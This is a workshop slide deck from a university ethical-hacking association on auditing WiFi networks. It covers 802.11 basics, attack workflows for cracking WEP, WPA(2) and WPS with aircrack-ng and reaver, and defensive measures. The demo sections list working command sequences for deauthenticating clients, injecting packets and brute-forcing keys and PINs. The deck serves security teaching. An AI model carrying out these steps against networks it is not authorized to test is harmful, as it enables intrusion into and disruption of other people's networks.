Auditoria de Xarxes WiFi
Hacking Lliure
Dimecres 26 d'Abril de 2017
Facultat de Matemàtiques i Informàtica
Universitat de Barcelona
About
Hacking Lliure
- Associació de Hacking Ètic i Seguretat Informàtica
- Gestada a les acaballes del 2016 per estudiants de la facultat
-
Constituïda formalment a principis del 2017
- UB
- Catalunya
- Presentació oficial: 27/02/17
Me (Arnau Gàmez i Montolio)
- Maths + CS @ UB
- PhD research program assistant @ Facultat de Física UB
-
Participant de:
- No cON Name '15
- RootedCON '16, '17
- r2con '16
- PyConES '16
- Cofundador & President Hacking Lliure
Disclaimer
Hacking into anyone’s WiFi without permission is considered an illegal act. We are performing this tutorial for the sake of penetration testing, hacking to become more secure, and are using our own test networks and routers
Content
-
Preliminary
-
Basic concepts
-
Attacking WEP
-
Attacking WPA(2)
-
Attacking WPS
-
More attack vectors
-
Security Measures
Preliminary
Objective(s)
Introduce offensive security methodologies oriented to Wireless Networks.
Focused on a domestic sphere or little infrastructures
Main tools used
Software
- OS: WifiSlax64-1.0-final
- Suite aircrack-ng
- reaver
Hardware
- Antenna: Alfa AWUS036H
Basic Concepts
IEEE 802.11
Set of standards developed by the IEEE working group 11 (Wireless LAN)
- 802.11 – The original WLAN standard
- 802.11a – Up to 54 Mbit/s on 5 GHz
- 802.11b – 5.5 Mbit/s and 11 Mbit/s on 2.4 GHz
- 802.11g – Up to 54 Mbit/s on 2.4 GHz. Backward compatible with 802.11b
- 802.11i – Provides enhanced security
- 802.11n – Provides higher throughput with Multiple Input/Multiple Output (MIMO)
IEEE 802.11 main standards
IEEE 802.11g/b wireless nodes communicate with each other using radio frequency signals in the ISM (Industrial, Scientific, and Medical) band between 2.4 GHz and 2.5 GHz

IEEE 802.11 sounds weird
Just call it WiFi
Note: It is not exactly the same, but it is the same "almost everywhere"
- WLAN (Wireless Local Area Network)
- MAC (Media Access Control) address: unique identifier assigned to network interfaces for communications at the data link layer of a network segment
- BSSID (Basic Service Set Identification): MAC address of the access point
- ESSID (Extended Service Set Identification): Wireless network name
- CHANNEL: Determines the frequency where Wireless Network operates
Wireless Operating Modes
-
Infrastructure: the Access Point (AP) sets the SSID
-
Ad-hoc: the Station (STA) that is creating the network sets the SSID
We will focus on Infrastucture Operating Mode
Monitor Mode
Monitor mode is not really a wireless mode but it is especially important in attacking wireless networks.
In a nutshell, Monitor mode allows a wireless card to “monitor” the packets that are received without any filtering.
When using some wireless drivers, this mode allows for the sending of raw 802.11 frames
Suite aircrack-ng
- airmon-ng: This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode.
- airodump-ng: Used for packet capturing of raw 802.11 frames
- aireplay-ng: Used to inject frames.
- aircrack-ng: It is an 802.11 WEP and WPA/WPA2-PSK key cracking program
Attacking WEP
(Wired Equivalent Privacy)
What?
Why?
Concepts
- IV (Initialization Vector): Fixed-size input to a cryptographic primitive that is typically required to be random or pseudorandom
- ARP (Address Resolution Protocol): A TCP/IP protocol used to convert an IP address into a physical address, such as an Ethernet address. A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the address in the request then replies with its physical hardware address
Attack workflow
-
Start the wireless interface in monitor mode
-
Use airodump-ng to locate our target AP
-
Test the injection capability of the wireless device to the AP
-
Start airodump-ng on AP channel with a bssid filter to collect the new unique IVs
-
Use aireplay-ng to do a fake authentication with the access point
-
Start aireplay-ng in ARP request replay mode to inject packets
-
Run aircrack-ng to crack key using the IVs collected
Demo
-
airmon-ng start wlan0
-
airodump-ng mon0 --encrypt WEP
-
aireplay-ng mon0 -9 -e [ESSID] -a [BSSID]
-
airodump-ng mon0 -c [CHANNEL] --bssid [BSSID] -w WEP_TEST_CAP
-
aireplay-ng mon0 -1 0 -e [ESSID] -a [BSSID] -h [MAC]
-
aireplay-ng mon0 -3 -b [BSSID] -h [MAC]
-
aircrack-ng WEP_TEST_CAP-01.cap
*We assume the wireless adapter is wlan0 and it is activated as mon0 in monitor mode
Shortcuts
-
Limited number of possible passwords
-
Most WLAN_XX and JAZZTEL_XX
-
Attacking WPA(2)
(Wi-Fi Protected Access)
What?
Why?
Concepts
- Bruteforce
- (4-way) HandShake
- Wordlist
Attack workflow
-
Start the wireless interface in monitor mode
-
Use airodump-ng to locate our target AP
-
Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
-
Use aireplay-ng to deauthenticate the wireless client
-
Run aircrack-ng to crack the pre-shared key using the authentication handshake
Demo
-
airmon-ng start wlan0
-
airodump-ng mon0 --encrypt WPA
-
airodump-ng mon0 -c [CHANNEL] --bssid [BSSID] -w WEP_TEST_CAP
-
aireplay-ng mon0 -0 [N_DEAUTH_PACKETS] -a [BSSID] -c [CLIENT_MAC]
-
aircrack-ng WPA_TEST_CAP-01.cap -w [WORDLIST]
*We assume the wireless adapter is wlan0 and it is activated as mon0 in monitor mode
Shortcuts
Available in all cases
- Use GPU for bruteforcing
- Use Rainbow Tables (precomputed tables for reversing cryptographic hash functions)
Only available in some cases
-
Directly computable password
- Examples: some of the first WLAN_XXXX and JAZZTEL_XXXX
-
Limited number of possible passwords (by range or by charset)
- Examples: some Orange-XXXX
Attacking WPS
(Wi-Fi Protected Setup)
What?
Why?
Attack workflow
-
Start the wireless interface in monitor mode
-
Use wash to locate our target AP (it will only appear if WPS is enabled)
-
Use reaver to crack WPS pin and recover PSK
Demo
-
airmon-ng start wlan0
-
wash -i mon0 -C
-
reaver -i mon0 --bssid [BSSID] -c [CHANNEL] -vv
*We assume the wireless adapter is wlan0 and it is activated as mon0 in monitor mode
Shortcuts
-
Generic/Computable PINs
-
Pixie Dust Attack (Offline PIN cracking)
More attack vectors
- Social Engineering
- Evil Twin
- MITM
Security Measures
- Change default credentials (router & AP)
- Use WPA2-PSK (AES) encryption protocol
- Use strong passwords
- Disable WPS
Almost useless methods
- MAC filtering
- (E)SSID hiding
"You can't download a patch for human stupidity"
- Kevin Mitnick
Contact
- Web → hackinglliure.org
- Mail → info@hackinglliure.org
- Github → HackingLliure
- Twitter → @HackingLliure
Doubts
Questions
Comments
(?)
taller-matefest-infofest
By hackinglliure
taller-matefest-infofest
- 2,166